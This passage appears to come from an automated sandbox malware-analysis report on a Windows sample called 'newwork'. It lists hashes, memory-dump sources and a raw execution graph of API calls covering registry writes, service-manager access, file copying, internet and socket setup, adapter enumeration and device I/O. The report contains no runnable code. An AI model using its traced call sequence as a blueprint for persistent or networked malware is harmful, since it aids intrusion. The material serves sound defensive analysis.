                                                                                • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                Strings
                                                                                • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                • String ID: Detected restart. Removing temporary directory.
                                                                                • API String ID: 1717587489-3199836293
                                                                                • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:84.2%
                                                                                Signature Coverage:6.6%
                                                                                Total number of Nodes:977
                                                                                Total number of Limit Nodes:30
                                                                                execution_graph 61183 402a20 GetVersion 61207 403b64 HeapCreate 61183->61207 61185 402a7f 61186 402a84 61185->61186 61187 402a8c 61185->61187 61282 402b3b 8 API calls 61186->61282 61219 403844 61187->61219 61191 402a94 GetCommandLineA 61233 403712 61191->61233 61195 402aae 61265 40340c 61195->61265 61197 402ab3 61198 402ab8 GetStartupInfoA 61197->61198 61278 4033b4 61198->61278 61200 402aca GetModuleHandleA 61202 402aee 61200->61202 61283 40315b GetCurrentProcess TerminateProcess ExitProcess 61202->61283 61204 402af7 61284 403230 UnhandledExceptionFilter 61204->61284 61206 402b08 61208 403b84 61207->61208 61209 403bba 61207->61209 61285 403a1c 19 API calls 61208->61285 61209->61185 61211 403b89 61212 403ba0 61211->61212 61213 403b93 61211->61213 61214 403bbd 61212->61214 61287 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61212->61287 61286 403f3b HeapAlloc 61213->61286 61214->61185 61217 403b9d 61217->61214 61218 403bae HeapDestroy 61217->61218 61218->61209 61288 402b5f 61219->61288 61222 403863 GetStartupInfoA 61230 4038af 61222->61230 61231 403974 61222->61231 61225 4039db SetHandleCount 61225->61191 61226 40399b GetStdHandle 61228 4039a9 GetFileType 61226->61228 61226->61231 61227 402b5f 12 API calls 61227->61230 61228->61231 61229 403920 61229->61231 61232 403942 GetFileType 61229->61232 61230->61227 61230->61229 61230->61231 61231->61225 61231->61226 61232->61229 61234 403760 61233->61234 61235 40372d GetEnvironmentStringsW 61233->61235 61237 403735 61234->61237 61238 403751 61234->61238 61236 403741 GetEnvironmentStrings 61235->61236 61235->61237 61236->61238 61239 402aa4 61236->61239 61240 403779 WideCharToMultiByte 61237->61240 61241 40376d GetEnvironmentStringsW 61237->61241 61238->61239 61243 4037f3 GetEnvironmentStrings 61238->61243 61244 4037ff 61238->61244 61256 4034c5 61239->61256 61245 4037ad 61240->61245 61246 4037df FreeEnvironmentStringsW 61240->61246 61241->61239 61241->61240 61243->61239 61243->61244 61247 402b5f 12 API calls 61244->61247 61248 402b5f 12 API calls 61245->61248 61246->61239 61254 40381a 61247->61254 61249 4037b3 61248->61249 61249->61246 61250 4037bc WideCharToMultiByte 61249->61250 61252 4037d6 61250->61252 61253 4037cd 61250->61253 61251 403830 FreeEnvironmentStringsA 61251->61239 61252->61246 61297 402c11 61253->61297 61254->61251 61257 4034d7 61256->61257 61258 4034dc GetModuleFileNameA 61256->61258 61310 405d24 19 API calls 61257->61310 61259 4034ff 61258->61259 61261 402b5f 12 API calls 61259->61261 61262 403520 61261->61262 61263 403530 61262->61263 61311 402b16 7 API calls 61262->61311 61263->61195 61266 403419 61265->61266 61268 40341e 61265->61268 61312 405d24 19 API calls 61266->61312 61269 402b5f 12 API calls 61268->61269 61270 40344b 61269->61270 61277 40345f 61270->61277 61313 402b16 7 API calls 61270->61313 61272 4034a2 61273 402c11 7 API calls 61272->61273 61274 4034ae 61273->61274 61274->61197 61275 402b5f 12 API calls 61275->61277 61277->61272 61277->61275 61314 402b16 7 API calls 61277->61314 61279 4033bd 61278->61279 61281 4033c2 61278->61281 61315 405d24 19 API calls 61279->61315 61281->61200 61283->61204 61284->61206 61285->61211 61286->61217 61287->61217 61292 402b71 61288->61292 61291 402b16 7 API calls 61291->61222 61293 402b6e 61292->61293 61295 402b78 61292->61295 61293->61222 61293->61291 61295->61293 61296 402b9d 12 API calls 61295->61296 61296->61295 61298 402c39 61297->61298 61299 402c1d 61297->61299 61298->61252 61300 402c27 61299->61300 61301 402c3d 61299->61301 61303 402c69 HeapFree 61300->61303 61304 402c33 61300->61304 61302 402c68 61301->61302 61306 402c57 61301->61306 61302->61303 61303->61298 61308 403fae VirtualFree VirtualFree HeapFree 61304->61308 61309 404a3f VirtualFree HeapFree VirtualFree 61306->61309 61308->61298 61309->61298 61310->61258 61311->61263 61312->61268 61313->61277 61314->61277 61315->61281 61316 40d4e0 61317 40d4ff Sleep 61316->61317 60784 2d74616 60785 2d87646 InternetOpenA 60784->60785 61318 401662 61319 4020e2 RegSetValueExA 61318->61319 61321 40d0d0 61319->61321 61321->61321 60787 402204 VirtualAlloc 60788 40d7e5 60787->60788 61322 2d3ca75 CloseHandle 61323 2d44ca4 61322->61323 61323->61323 61324 402067 RegCreateKeyExA 61325 401c12 61324->61325 60789 401c0c RegCloseKey 60790 401c12 60789->60790 60791 401b4d 60795 401897 60791->60795 60796 401e4e 60797 401e51 60796->60797 60799 401dd0 60796->60799 60798 401e56 LoadLibraryExA 60797->60798 60797->60799 60798->60799 60800 2d05e5e RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 60838 2d042c7 60800->60838 60802 2d05ecb GetTickCount 60803 2d059fa 59 API calls 60802->60803 60804 2d05ee8 GetVersionExA 60803->60804 60805 2d05f29 _memset 60804->60805 60806 2d11fbc _malloc 59 API calls 60805->60806 60807 2d05f36 60806->60807 60808 2d11fbc _malloc 59 API calls 60807->60808 60809 2d05f46 60808->60809 60810 2d11fbc _malloc 59 API calls 60809->60810 60811 2d05f51 60810->60811 60812 2d11fbc _malloc 59 API calls 60811->60812 60813 2d05f5c 60812->60813 60814 2d11fbc _malloc 59 API calls 60813->60814 60815 2d05f67 60814->60815 60816 2d11fbc _malloc 59 API calls 60815->60816 60817 2d05f72 60816->60817 60818 2d11fbc _malloc 59 API calls 60817->60818 60819 2d05f7d 60818->60819 60820 2d11fbc _malloc 59 API calls 60819->60820 60821 2d05f89 6 API calls 60820->60821 60822 2d05fd6 _memset 60821->60822 60823 2d05fef RtlEnterCriticalSection RtlLeaveCriticalSection 60822->60823 60824 2d11fbc _malloc 59 API calls 60823->60824 60825 2d0602b 60824->60825 60826 2d11fbc _malloc 59 API calls 60825->60826 60827 2d06039 60826->60827 60828 2d11fbc _malloc 59 API calls 60827->60828 60829 2d06040 60828->60829 60830 2d11fbc _malloc 59 API calls 60829->60830 60831 2d06061 QueryPerformanceCounter Sleep 60830->60831 60832 2d11fbc _malloc 59 API calls 60831->60832 60833 2d06087 60832->60833 60834 2d11fbc _malloc 59 API calls 60833->60834 60835 2d06097 _memset 60834->60835 60836 2d06104 Sleep 60835->60836 60837 2d0610a RtlEnterCriticalSection RtlLeaveCriticalSection 60835->60837 60836->60837 60837->60835 60839 40228f 60840 40dd06 60839->60840 60842 401301 FindResourceA 60840->60842 60843 401367 SizeofResource 60842->60843 60848 401360 60842->60848 60844 401386 LoadResource LockResource GlobalAlloc 60843->60844 60843->60848 60845 4013cc 60844->60845 60846 40141f GetTickCount 60845->60846 60849 40142a GlobalAlloc 60846->60849 60848->60840 60849->60848 61326 401b6f RegOpenKeyExA 61327 401dbe 61326->61327 60850 40d950 60851 40d955 OpenSCManagerA 60850->60851 60853 4021ed 60851->60853 60852 40e09b 60853->60851 60853->60852 61328 40d674 61329 40d605 CopyFileA 61328->61329 61330 4019aa 61329->61330 61331 40d613 61329->61331 61331->61328 61332 4018b6 61333 40230f lstrcmpiW 61332->61333 61335 401717 61333->61335 61334 40d7cd lstrcmpiW 61336 40d87f 61334->61336 61335->61334 61337 2d0e8a7 CreateFileA 61338 2d0e9a3 61337->61338 61343 2d0e8d8 61337->61343 61339 2d0e8f0 DeviceIoControl 61339->61343 61340 2d0e999 CloseHandle 61340->61338 61341 2d0e965 GetLastError 61341->61340 61341->61343 61342 2d127c5 _Allocate 60 API calls 61342->61343 61343->61339 61343->61340 61343->61341 61343->61342 60854 2d12988 60855 2d12991 60854->60855 60856 2d12996 60854->60856 60868 2d1918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 60855->60868 60860 2d129ab 60856->60860 60859 2d129a4 60862 2d129b7 CallCatchBlock 60860->60862 60861 2d12a05 ___DllMainCRTStartup 60864 2d12a62 CallCatchBlock 60861->60864 60865 2d12a3f 60861->60865 60867 2d12816 __CRT_INIT@12 138 API calls 60861->60867 60862->60861 60862->60864 60869 2d12816 60862->60869 60864->60859 60865->60864 60866 2d12816 __CRT_INIT@12 138 API calls 60865->60866 60866->60864 60867->60865 60868->60856 60870 2d12822 CallCatchBlock 60869->60870 60871 2d128a4 60870->60871 60872 2d1282a 60870->60872 60874 2d128a8 60871->60874 60875 2d1290d 60871->60875 60917 2d16e56 GetProcessHeap 60872->60917 60879 2d128c9 60874->60879 60910 2d12833 CallCatchBlock __CRT_INIT@12 60874->60910 61006 2d17019 59 API calls _doexit 60874->61006 60876 2d12970 60875->60876 60877 2d12912 60875->60877 60876->60910 61037 2d14894 59 API calls 2 library calls 60876->61037 61011 2d17d8b 60877->61011 60878 2d1282f 60878->60910 60918 2d14a04 60878->60918 61007 2d16ef0 61 API calls _free 60879->61007 60884 2d1291d 60884->60910 61014 2d1762a 60884->61014 60886 2d1283f __RTC_Initialize 60894 2d1284f GetCommandLineA 60886->60894 60886->60910 60887 2d128ce 60889 2d128df __CRT_INIT@12 60887->60889 61008 2d18e2a 60 API calls _free 60887->61008 61010 2d128f8 62 API calls __mtterm 60889->61010 60893 2d128da 61009 2d14a7a 62 API calls 2 library calls 60893->61009 60939 2d19228 GetEnvironmentStringsW 60894->60939 60898 2d12946 60900 2d12964 60898->60900 60901 2d1294c 60898->60901 61031 2d11f84 60900->61031 61021 2d14951 60901->61021 60905 2d12869 60907 2d1286d 60905->60907 60971 2d18e7c 60905->60971 60906 2d12954 GetCurrentThreadId 60906->60910 61004 2d14a7a 62 API calls 2 library calls 60907->61004 60910->60861 60912 2d1288d 60912->60910 61005 2d18e2a 60 API calls _free 60912->61005 60917->60878 61038 2d170c0 36 API calls 2 library calls 60918->61038 60920 2d14a09 61039 2d175dc InitializeCriticalSectionAndSpinCount __mtinitlocks 60920->61039 60922 2d14a0e 60923 2d14a12 60922->60923 61041 2d17d4e TlsAlloc 60922->61041 61040 2d14a7a 62 API calls 2 library calls 60923->61040 60926 2d14a17 60926->60886 60927 2d14a24 60927->60923 60928 2d14a2f 60927->60928 60929 2d1762a __calloc_crt 59 API calls 60928->60929 60930 2d14a3c 60929->60930 60931 2d14a71 60930->60931 61042 2d17daa TlsSetValue 60930->61042 61043 2d14a7a 62 API calls 2 library calls 60931->61043 60934 2d14a50 60934->60931 60936 2d14a56 60934->60936 60935 2d14a76 60935->60886 60937 2d14951 __initptd 59 API calls 60936->60937 60938 2d14a5e GetCurrentThreadId 60937->60938 60938->60886 60940 2d1285f 60939->60940 60941 2d1923b WideCharToMultiByte 60939->60941 60952 2d18b76 60940->60952 60943 2d192a5 FreeEnvironmentStringsW 60941->60943 60944 2d1926e 60941->60944 60943->60940 61044 2d17672 59 API calls 2 library calls 60944->61044 60946 2d19274 60946->60943 60947 2d1927b WideCharToMultiByte 60946->60947 60948 2d19291 60947->60948 60949 2d1929a FreeEnvironmentStringsW 60947->60949 60950 2d11f84 _free 59 API calls 60948->60950 60949->60940 60951 2d19297 60950->60951 60951->60949 60953 2d18b82 CallCatchBlock 60952->60953 61045 2d174ab 60953->61045 60955 2d18b89 60956 2d1762a __calloc_crt 59 API calls 60955->60956 60958 2d18b9a 60956->60958 60957 2d18c05 GetStartupInfoW 60965 2d18c1a 60957->60965 60966 2d18d49 60957->60966 60958->60957 60959 2d18ba5 CallCatchBlock @_EH4_CallFilterFunc@8 60958->60959 60959->60905 60960 2d18e11 61054 2d18e21 RtlLeaveCriticalSection _doexit 60960->61054 60962 2d1762a __calloc_crt 59 API calls 60962->60965 60963 2d18d96 GetStdHandle 60963->60966 60964 2d18da9 GetFileType 60964->60966 60965->60962 60965->60966 60967 2d18c68 60965->60967 60966->60960 60966->60963 60966->60964 61053 2d17dcc InitializeCriticalSectionAndSpinCount 60966->61053 60967->60966 60968 2d18c9c GetFileType 60967->60968 61052 2d17dcc InitializeCriticalSectionAndSpinCount 60967->61052 60968->60967 60972 2d18e8a 60971->60972 60973 2d18e8f GetModuleFileNameA 60971->60973 61063 2d13efa 71 API calls __setmbcp 60972->61063 60975 2d18ebc 60973->60975 61057 2d18f2f 60975->61057 60979 2d18ef5 60980 2d18f2f _parse_cmdline 59 API calls 60979->60980 60981 2d12879 60979->60981 60980->60981 60981->60912 60982 2d190ab 60981->60982 60983 2d190b4 60982->60983 60985 2d190b9 _strlen 60982->60985 61067 2d13efa 71 API calls __setmbcp 60983->61067 60986 2d1762a __calloc_crt 59 API calls 60985->60986 60989 2d12882 60985->60989 60994 2d190ef _strlen 60986->60994 60987 2d19141 60988 2d11f84 _free 59 API calls 60987->60988 60988->60989 60989->60912 60998 2d17028 60989->60998 60990 2d1762a __calloc_crt 59 API calls 60990->60994 60991 2d19168 60993 2d11f84 _free 59 API calls 60991->60993 60993->60989 60994->60987 60994->60989 60994->60990 60994->60991 60995 2d1917f 60994->60995 61068 2d1592c 59 API calls __fclose_nolock 60994->61068 61069 2d13b75 8 API calls 2 library calls 60995->61069 60997 2d1918b 61000 2d17034 __IsNonwritableInCurrentImage 60998->61000 61070 2d1ab8f 61000->61070 61001 2d17052 __initterm_e 61003 2d17071 __cinit __IsNonwritableInCurrentImage 61001->61003 61073 2d123b4 61001->61073 61003->60912 61004->60910 61005->60907 61006->60879 61007->60887 61008->60893 61009->60889 61010->60910 61012 2d17da2 TlsGetValue 61011->61012 61013 2d17d9e 61011->61013 61012->60884 61013->60884 61016 2d17631 61014->61016 61017 2d1292e 61016->61017 61019 2d1764f 61016->61019 61108 2d1e9b8 61016->61108 61017->60910 61020 2d17daa TlsSetValue 61017->61020 61019->61016 61019->61017 61116 2d180c5 Sleep 61019->61116 61020->60898 61022 2d1495d CallCatchBlock 61021->61022 61023 2d174ab __lock 59 API calls 61022->61023 61024 2d1499a 61023->61024 61119 2d149f2 61024->61119 61027 2d174ab __lock 59 API calls 61028 2d149bb ___addlocaleref 61027->61028 61122 2d149fb 61028->61122 61030 2d149e6 CallCatchBlock 61030->60906 61032 2d11f8d HeapFree 61031->61032 61036 2d11fb6 _free 61031->61036 61033 2d11fa2 61032->61033 61032->61036 61127 2d14acb 59 API calls __getptd_noexit 61033->61127 61035 2d11fa8 GetLastError 61035->61036 61036->60910 61037->60910 61038->60920 61039->60922 61040->60926 61041->60927 61042->60934 61043->60935 61044->60946 61046 2d174bc 61045->61046 61047 2d174cf RtlEnterCriticalSection 61045->61047 61055 2d17533 59 API calls 9 library calls 61046->61055 61047->60955 61049 2d174c2 61049->61047 61056 2d16ffd 59 API calls 3 library calls 61049->61056 61052->60967 61053->60966 61054->60959 61055->61049 61059 2d18f51 61057->61059 61062 2d18fb5 61059->61062 61065 2d1ef96 59 API calls x_ismbbtype_l 61059->61065 61060 2d18ed2 61060->60981 61064 2d17672 59 API calls 2 library calls 61060->61064 61062->61060 61066 2d1ef96 59 API calls x_ismbbtype_l 61062->61066 61063->60973 61064->60979 61065->61059 61066->61062 61067->60985 61068->60994 61069->60997 61071 2d1ab92 RtlEncodePointer 61070->61071 61071->61071 61072 2d1abac 61071->61072 61072->61001 61076 2d122b8 61073->61076 61075 2d123bf 61075->61003 61077 2d122c4 CallCatchBlock 61076->61077 61084 2d17150 61077->61084 61083 2d122eb CallCatchBlock 61083->61075 61085 2d174ab __lock 59 API calls 61084->61085 61086 2d122cd 61085->61086 61087 2d122fc RtlDecodePointer RtlDecodePointer 61086->61087 61088 2d12329 61087->61088 61089 2d122d9 61087->61089 61088->61089 61101 2d17d1d 60 API calls __fclose_nolock 61088->61101 61098 2d122f6 61089->61098 61091 2d1238c RtlEncodePointer RtlEncodePointer 61091->61089 61092 2d12360 61092->61089 61096 2d1237a RtlEncodePointer 61092->61096 61103 2d176b9 62 API calls 2 library calls 61092->61103 61093 2d1233b 61093->61091 61093->61092 61102 2d176b9 62 API calls 2 library calls 61093->61102 61096->61091 61097 2d12374 61097->61089 61097->61096 61104 2d17159 61098->61104 61101->61093 61102->61092 61103->61097 61107 2d17615 RtlLeaveCriticalSection 61104->61107 61106 2d122fb 61106->61083 61107->61106 61109 2d1e9c3 61108->61109 61114 2d1e9de 61108->61114 61110 2d1e9cf 61109->61110 61109->61114 61117 2d14acb 59 API calls __getptd_noexit 61110->61117 61112 2d1e9ee RtlAllocateHeap 61113 2d1e9d4 61112->61113 61112->61114 61113->61016 61114->61112 61114->61113 61118 2d16e73 RtlDecodePointer 61114->61118 61116->61019 61117->61113 61118->61114 61125 2d17615 RtlLeaveCriticalSection 61119->61125 61121 2d149b4 61121->61027 61126 2d17615 RtlLeaveCriticalSection 61122->61126 61124 2d14a02 61124->61030 61125->61121 61126->61124 61127->61035 61344 4021bb 61345 4021c8 61344->61345 61346 402223 CopyFileA 61345->61346 61348 4021e0 61345->61348 61350 402171 61345->61350 61346->61350 61347 40d955 OpenSCManagerA 61347->61350 61349 40e09b 61350->61347 61350->61349 61351 401b7c 61352 402277 RegQueryValueExA 61351->61352 61128 2d0104d 61129 2d123b4 __cinit 68 API calls 61128->61129 61130 2d01057 61129->61130 61133 2d01aa9 InterlockedIncrement 61130->61133 61134 2d01ac5 WSAStartup InterlockedExchange 61133->61134 61135 2d0105c 61133->61135 61134->61135 61136 2d3c80e 61137 2d3c812 61136->61137 61140 2d0e9ab LoadLibraryA 61137->61140 61138 2d3c817 61138->61138 61141 2d0e9d4 GetProcAddress 61140->61141 61142 2d0ea8e 61140->61142 61143 2d0ea87 FreeLibrary 61141->61143 61144 2d0e9e8 61141->61144 61142->61138 61143->61142 61145 2d0e9fa GetAdaptersInfo 61144->61145 61146 2d0ea82 61144->61146 61148 2d127c5 61144->61148 61145->61144 61146->61143 61151 2d127cd 61148->61151 61150 2d127e7 61150->61144 61151->61150 61153 2d127eb std::exception::exception 61151->61153 61156 2d11fbc 61151->61156 61173 2d16e73 RtlDecodePointer 61151->61173 61174 2d131ca RaiseException 61153->61174 61155 2d12815 61157 2d12037 61156->61157 61165 2d11fc8 61156->61165 61181 2d16e73 RtlDecodePointer 61157->61181 61159 2d1203d 61182 2d14acb 59 API calls __getptd_noexit 61159->61182 61162 2d11ffb RtlAllocateHeap 61162->61165 61172 2d1202f 61162->61172 61164 2d12023 61179 2d14acb 59 API calls __getptd_noexit 61164->61179 61165->61162 61165->61164 61166 2d11fd3 61165->61166 61170 2d12021 61165->61170 61178 2d16e73 RtlDecodePointer 61165->61178 61166->61165 61175 2d17291 59 API calls __NMSG_WRITE 61166->61175 61176 2d172ee 59 API calls 7 library calls 61166->61176 61177 2d16eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61166->61177 61180 2d14acb 59 API calls __getptd_noexit 61170->61180 61172->61151 61173->61151 61174->61155 61175->61166 61176->61166 61178->61165 61179->61170 61180->61172 61181->61159 61182->61172 61354 4022ff 61355 4022fe 61354->61355 61355->61354 61356 40d0b4 RegCloseKey 61355->61356 61357 2d0642f 61360 2d0644a _memset 61357->61360 61358 2d06104 Sleep 61359 2d0610a RtlEnterCriticalSection RtlLeaveCriticalSection 61358->61359 61389 2d060f0 61359->61389 61361 2d0649e RtlEnterCriticalSection RtlLeaveCriticalSection 61360->61361 61360->61389 61445 2d1134c 61361->61445 61363 2d064c5 61364 2d06509 61363->61364 61366 2d1134c 66 API calls 61363->61366 61365 2d1134c 66 API calls 61364->61365 61364->61389 61367 2d06527 61365->61367 61368 2d064d6 61366->61368 61369 2d067d2 61367->61369 61371 2d06539 61367->61371 61368->61364 61372 2d1134c 66 API calls 61368->61372 61370 2d1134c 66 API calls 61369->61370 61373 2d067dd 61370->61373 61374 2d11fbc _malloc 59 API calls 61371->61374 61375 2d064e7 61372->61375 61376 2d06826 61373->61376 61378 2d067e7 _memset 61373->61378 61377 2d06540 RtlEnterCriticalSection RtlLeaveCriticalSection 61374->61377 61375->61364 61380 2d1134c 66 API calls 61375->61380 61379 2d1134c 66 API calls 61376->61379 61398 2d06578 _memset 61377->61398 61383 2d067f7 RtlEnterCriticalSection RtlLeaveCriticalSection 61378->61383 61381 2d06831 61379->61381 61382 2d064f8 61380->61382 61384 2d06837 61381->61384 61385 2d0684a 61381->61385 61382->61364 61386 2d1134c 66 API calls 61382->61386 61383->61389 61498 2d05c11 61384->61498 61387 2d1134c 66 API calls 61385->61387 61386->61364 61390 2d06855 61387->61390 61389->61358 61389->61359 61390->61389 61502 2d11428 61390->61502 61394 2d06924 61395 2d0695c RtlEnterCriticalSection 61394->61395 61396 2d06989 RtlLeaveCriticalSection 61395->61396 61397 2d0697f 61395->61397 61522 2d03c67 61396->61522 61397->61396 61401 2d1134c 66 API calls 61398->61401 61405 2d065f8 61398->61405 61399 2d11fbc _malloc 59 API calls 61406 2d0662f _memset 61399->61406 61401->61405 61405->61399 61409 2d06694 61406->61409 61560 2d125f6 65 API calls 7 library calls 61406->61560 61411 2d11f84 _free 59 API calls 61409->61411 61410 2d06b58 61567 2d08007 88 API calls __EH_prolog 61410->61567 61415 2d0669a 61411->61415 61415->61389 61417 2d127c5 _Allocate 60 API calls 61415->61417 61416 2d06b20 61552 2d073ee 61416->61552 61419 2d066aa 61417->61419 61424 2d066c5 61419->61424 61563 2d0873b 212 API calls __EH_prolog 61419->61563 61423 2d09729 73 API calls 61431 2d06a8b 61423->61431 61455 2d09853 61424->61455 61425 2d06660 61425->61409 61561 2d11860 59 API calls _vscan_fn 61425->61561 61562 2d125f6 65 API calls 7 library calls 61425->61562 61430 2d066db 61459 2d05119 61430->61459 61431->61416 61432 2d09729 73 API calls 61431->61432 61434 2d06adc 61432->61434 61434->61416 61547 2d0c11b 61434->61547 61436 2d06717 61488 2d09c13 61436->61488 61439 2d06774 Sleep 61564 2d10900 GetProcessHeap HeapFree 61439->61564 61440 2d0676f shared_ptr 61440->61439 61442 2d06790 61443 2d067aa shared_ptr 61442->61443 61565 2d04100 GetProcessHeap HeapFree 61442->61565 61443->61389 61446 2d1137b 61445->61446 61447 2d11358 61445->61447 61570 2d11393 66 API calls 4 library calls 61446->61570 61447->61446 61449 2d1135e 61447->61449 61568 2d14acb 59 API calls __getptd_noexit 61449->61568 61450 2d1138e 61450->61363 61452 2d11363 61569 2d13b65 9 API calls __fclose_nolock 61452->61569 61454 2d1136e 61454->61363 61456 2d0985d __EH_prolog 61455->61456 61571 2d0d004 61456->61571 61458 2d0987b shared_ptr 61458->61430 61460 2d05123 __EH_prolog 61459->61460 61575 2d0fb20 61460->61575 61463 2d03c67 72 API calls 61464 2d0514a 61463->61464 61465 2d03d7e 64 API calls 61464->61465 61466 2d05158 61465->61466 61467 2d0733f 89 API calls 61466->61467 61468 2d0516c 61467->61468 61469 2d09729 73 API calls 61468->61469 61471 2d05322 shared_ptr 61468->61471 61470 2d0519d 61469->61470 61470->61471 61472 2d051c4 61470->61472 61473 2d051f6 61470->61473 61471->61436 61475 2d09729 73 API calls 61472->61475 61474 2d09729 73 API calls 61473->61474 61477 2d05207 61474->61477 61476 2d051d4 61475->61476 61476->61471 61479 2d09729 73 API calls 61476->61479 61477->61471 61478 2d09729 73 API calls 61477->61478 61480 2d0524a 61478->61480 61481 2d052b4 61479->61481 61480->61471 61482 2d09729 73 API calls 61480->61482 61481->61471 61483 2d09729 73 API calls 61481->61483 61482->61476 61484 2d052da 61483->61484 61484->61471 61485 2d09729 73 API calls 61484->61485 61486 2d05304 61485->61486 61486->61471 61579 2d0bedd 61486->61579 61489 2d09c1d __EH_prolog 61488->61489 61603 2d0c0f2 72 API calls 61489->61603 61491 2d09c3e shared_ptr 61604 2d11100 61491->61604 61493 2d09c55 61494 2d0675c 61493->61494 61610 2d03fb0 68 API calls Mailbox 61493->61610 61494->61439 61494->61440 61496 2d09c61 61611 2d0968f 60 API calls 4 library calls 61496->61611 61499 2d05c17 61498->61499 61500 2d11fbc _malloc 59 API calls 61499->61500 61501 2d05c24 61500->61501 61503 2d11444 61502->61503 61504 2d11459 61502->61504 61846 2d14acb 59 API calls __getptd_noexit 61503->61846 61504->61503 61506 2d11460 61504->61506 61848 2d14cc0 82 API calls 12 library calls 61506->61848 61508 2d11449 61847 2d13b65 9 API calls __fclose_nolock 61508->61847 61509 2d11486 61511 2d068a0 61509->61511 61849 2d14b71 79 API calls 6 library calls 61509->61849 61513 2d01ba7 61511->61513 61850 2d22a10 61513->61850 61515 2d01bb1 RtlEnterCriticalSection 61516 2d01bd1 61515->61516 61517 2d01be9 RtlLeaveCriticalSection 61515->61517 61516->61517 61519 2d01c55 RtlLeaveCriticalSection 61516->61519 61851 2d0d334 61517->61851 61519->61394 61520 2d01c22 61520->61519 61523 2d0fb20 Mailbox 68 API calls 61522->61523 61524 2d03c7e 61523->61524 61914 2d03ca2 61524->61914 61529 2d03d7e 61530 2d03d99 htons 61529->61530 61531 2d03dcb htons 61529->61531 61943 2d03bd3 60 API calls 2 library calls 61530->61943 61944 2d03c16 60 API calls 2 library calls 61531->61944 61534 2d03ded 61536 2d0733f 61534->61536 61535 2d03db7 htonl htonl 61535->61534 61537 2d07378 61536->61537 61538 2d07357 61536->61538 61541 2d069e9 61537->61541 61948 2d02ac7 61537->61948 61945 2d08601 61538->61945 61541->61410 61542 2d09729 61541->61542 61543 2d0fb20 Mailbox 68 API calls 61542->61543 61544 2d09743 61543->61544 61545 2d06a2f 61544->61545 62001 2d02db5 61544->62001 61545->61416 61545->61423 61548 2d0fb20 Mailbox 68 API calls 61547->61548 61551 2d0c131 61548->61551 61549 2d0c21f 61549->61416 61550 2d02db5 73 API calls 61550->61551 61551->61549 61551->61550 61553 2d07409 WSASetLastError shutdown 61552->61553 61554 2d073f9 61552->61554 61556 2d0950d 69 API calls 61553->61556 61555 2d0fb20 Mailbox 68 API calls 61554->61555 61557 2d06b38 61555->61557 61558 2d07426 61556->61558 61566 2d033b2 86 API calls 61557->61566 61558->61557 61559 2d0fb20 Mailbox 68 API calls 61558->61559 61559->61557 61560->61425 61561->61425 61562->61425 61563->61424 61564->61442 61565->61443 61566->61410 61567->61389 61568->61452 61569->61454 61570->61450 61572 2d0d00e __EH_prolog 61571->61572 61573 2d127c5 _Allocate 60 API calls 61572->61573 61574 2d0d025 61573->61574 61574->61458 61576 2d0513d 61575->61576 61577 2d0fb49 61575->61577 61576->61463 61578 2d123b4 __cinit 68 API calls 61577->61578 61578->61576 61580 2d0fb20 Mailbox 68 API calls 61579->61580 61583 2d0bef7 61580->61583 61581 2d0c006 61581->61471 61583->61581 61584 2d02b95 61583->61584 61585 2d02bb1 61584->61585 61586 2d02bc7 61584->61586 61587 2d0fb20 Mailbox 68 API calls 61585->61587 61589 2d02bd2 61586->61589 61598 